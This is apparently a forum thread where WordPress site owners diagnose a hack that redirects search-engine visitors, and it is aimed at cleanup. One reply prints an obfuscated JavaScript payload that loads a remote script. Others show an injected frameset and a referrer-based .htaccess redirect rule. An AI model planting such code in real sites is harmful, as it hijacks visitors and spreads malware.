We have the page domain.., and when you search at google.nl to Critical Alignment and click at the homepage of the site you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but can not find a redirect or anything.
Can someone help?
Have you checked if the redirect is made where the domain is hosted? Don't know what kind of host you use, but maybe the domain is set to redirect to that page from the host's side.
A good guide on what to do when your site gets hacked is this: http://codex.wordpress.org/FAQ_My_site_was_hacked
For your issue, check .htaccess first. There might be some redirect lines on the farthest right side of the file, so use the horizontal scroll bar.
Also, I would suggest to check with your host, since there might be many more files affected.
The same thing happened to me also.
First i thought it was a DNS hack problem, since it was a redirection problem. The hosting company responded to me that the DNS had no problems. Tey checked other common problems to find the source of the redirection and I was told that I had a malitious script in the header.php file, in the active theme foloder.
I manually checked the file in cPanel and I found the script that caused the redirection. To read more about this check the article on IStartBlogging
A new virus is spreading that is abusing the xmlrpc.php of wordpress to inject itself into the server and replace the javascript files with its own contaminated copies.
If you see too many xmlrpc requests POST requests from a suspicious ip-address, such as the below, verify the integrity of your javascript files.
$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
One key feature of this virus is, it primarily targets the jQuery.js, replacing it with its own version (that when users browsers to your site, automatically redirects them to clickbait articles).
It achieves this by first posting a new php files, such as recure.php which usually contain obfuscated php code, or uploading wordpress plugins to the upload folder.
Most probably the attackers are trying to redirect the page to a different web site if the referred pages are google, yahoo, msn, aol, bing.
They will give back a frameset( similar to iframe) when we request the pages from above-specified referrals.
<frameset rows="*,0" framespacing="0" border="0" frameborder="NO" data-gr-c-s-loaded="true">
<frame src="http://remote_site_address_here" noresize="" scrolling="auto">
<link rel="stylesheet" type="text/css" href="chrome-extensionlink/content.css">
</frameset>
So we will see our website name at the top of the address bar but the site content will be different. These are the common files that the hackers used to inject suspicious code.
Nowadays the recently infected cases are showing the malicious code injection is with .htaccess file. Here I am demonstrating the injected .htaccess file. Open your .htaccess file in the web root directory. And you can see this configurations
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ emilie-amethyst.php?$1 [L]
Here they are redirecting to the malicious php file emilie-amethyst.php if the referral pages are google|yahoo|msn|aol|bing. This is the reason of that redirect issue.
So You have to remove this redirection configuration from your .htaccess file and also remove the malicious script (in this case it is emilie-amethyst.php).
Try to click the link from google search. still, if you see the problem, then remove all cookies related to this particular site and retry. It should solve the issue
